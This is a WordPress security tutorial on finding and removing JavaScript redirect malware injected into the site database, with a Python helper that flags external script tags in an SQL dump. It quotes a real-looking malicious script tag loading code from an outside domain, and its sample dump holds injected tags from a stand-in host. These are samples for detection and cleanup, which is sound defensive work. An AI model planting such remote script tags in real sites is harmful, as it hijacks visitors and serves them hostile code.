How to Clean the JavaScript Redirect Malware from WordPress

JavaScript redirect malware is… well, special in many ways. One: the most common variant doesn’t infect the WordPress files, so you’ll go in loops installing and reinstalling WordPress to no effect. Two: common malware scans fail miserably at scanning the database. And finally, there’s no way to figure out if a redirect is genuine or malicious.

The cleanup of the JavaScript redirect malware needs manual intervention and some… “skills”. It is always challenging to detect the malicious script that keeps redirecting users to other sites. This tutorial will help you detect and remove JavaScript redirect malware.

Here’s how to identify JavaScript redirect malware

If you open the web page, it will redirect in no time. You can’t really trust the browser’s built-in Developer Tools because the inspector can’t really tell what kind of redirect it is.

The idea is to inspect the source-code of the WordPress page. For that you’ll have to view the source-code without actually visiting the URL.

Type the URL in the following format into the browser’s address-bar:

view-source:https://www.example.com

And now you can inspect it line by line. Feel free to copy / reformat / beautify the code to make it more legible. Given the right tools, this will help you identify the JavaScript snippet. You are looking for anything that starts with a <script> tag.

After fixing so many websites, here’s an example I remember:

<script src='https://setforspecialdomain.com/ghfgh34523452' type='text/javascript'></script>

Cleaning up the JavaScript Redirect Infection

The clean up routine consists of:

  1. Finding the JavaScript snippet in the database.
  2. Replacing it (with nothing).
  3. Verifying the redirect is gone.
  4. Identifying the root-cause.

Important Note: Prior to replacing anything, take a full backup of your website: WordPress files as well as the database.

Let’s start!


Step One: Finding the JavaScript snippet in the database

There are two steps in detecting the malicious JavaScript snippet:

  1. Run Database Scan: Start with scanning the database to find the malicious script. In most cases malCure’s WP Malware Scanner will be able to find the malicious script. Don’t rely on this alone. You need to follow the second step too.
  2. Scan Page Source: You need to closely watch for all the script tags in the source code of the pages that are redirecting to other sites. You may also want to scan your site using Sucuri’s SiteCheck (https://sitecheck.sucuri.net/).

Once you have identified the malicious code / malicious script, search for it using phpMyAdmin. Doing so will show you the infected tables.

Step Two: Replacing the malicious code (with nothing)

For the replacement part I trust a good code editor like VS Code. Export the database as an SQL file, open it in VS Code, do a find and replace, and save the file.

Go to phpMyAdmin, drop all the tables in the infected database, and import the cleaned-up file. If all went well, your site will be back. Voila!

If you are comfortable with WP CLI, follow the steps here: How to use WP CLI to Search & Replace in the Database
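
Before the find and replace, it helps to know which tables in the exported SQL file carry the injected tag. The following is an added example, not code from the original article: it lists every script tag loaded from a host you do not trust, grouped by table. The function name, the sample dump and its hosts are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# mysqldump writes a quote inside a string value as \' or \", so the tag
# seen in view-source appears in the dump with backslash-escaped quotes.
SCRIPT_SRC = re.compile(
    r"""<script\b[^>]*?\bsrc\s*=\s*\\?["']([^"'\\>\s]+)""", re.IGNORECASE)
INSERT_INTO = re.compile(r"INSERT INTO `([^`]+)`", re.IGNORECASE)

# Constructed sample dump (rows and hosts are made up for illustration).
SAMPLE_DUMP = r"""
INSERT INTO `wp_options` VALUES (1,'siteurl','https://www.example.com','yes');
INSERT INTO `wp_posts` VALUES (7,'<p>Hi</p><script src=\'https://cdn.injected.example/ab12\' type=\'text/javascript\'></script>','publish');
INSERT INTO `wp_posts` VALUES (8,'<script src=\"/wp-includes/js/jquery/jquery.min.js\"></script>','publish');
INSERT INTO `wp_postmeta` VALUES (3,7,'_footer','<script type=\"text/javascript\" src=\"//cdn.injected.example/zz\"></script>');
"""


def find_external_scripts(sql_text, trusted_hosts):
    """Return {table: {script_url, ...}} for script tags whose src points
    at a host that is not in trusted_hosts. Relative URLs are ignored."""
    trusted = {h.lower() for h in trusted_hosts}
    hits = defaultdict(set)
    table = None
    for line in sql_text.splitlines():
        m = INSERT_INTO.match(line)
        if m:
            table = m.group(1)  # mysqldump keeps one table per INSERT line
        if table is None:
            continue
        for url in SCRIPT_SRC.findall(line):
            # urlparse also resolves protocol-relative URLs (//host/path)
            host = (urlparse(url).hostname or "").lower()
            if host and host not in trusted:
                hits[table].add(url)
    return dict(hits)


if __name__ == "__main__":
    found = find_external_scripts(SAMPLE_DUMP, {"www.example.com"})
    for table, urls in sorted(found.items()):
        for url in sorted(urls):
            print(f"{table}: {url}")
```

A literal search for the tag exactly as it appears in view-source will miss the escaped form in the dump, so search for the URL itself. If a hit sits inside serialized PHP data (common in wp_options and wp_postmeta), a text-editor replace changes the string length and corrupts the value; the WP CLI search and replace handles serialized data.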

Step Three: Verifying the redirect is gone

After cleaning the database, visit the WordPress admin area and clear the cache. Now visit the front-end to make sure the site is not redirecting any more.

Visit the site in a private browsing window and reload multiple times to make sure there is no redirection.

Step Four: Identifying the root-cause

The most common cause of this infection is misuse of the “Database Search and Replace Script” or any other script that has write access to the database. These scripts must be positively removed after use and the website properly secured.

You also need to look elsewhere and see if anything else is left over and / or has access to the database. Revisit all the themes and plugins and check them for vulnerabilities against the WPScan Vulnerability Database. Delete all the inactive themes and plugins and remove plugins which are no longer actively maintained by the developer.
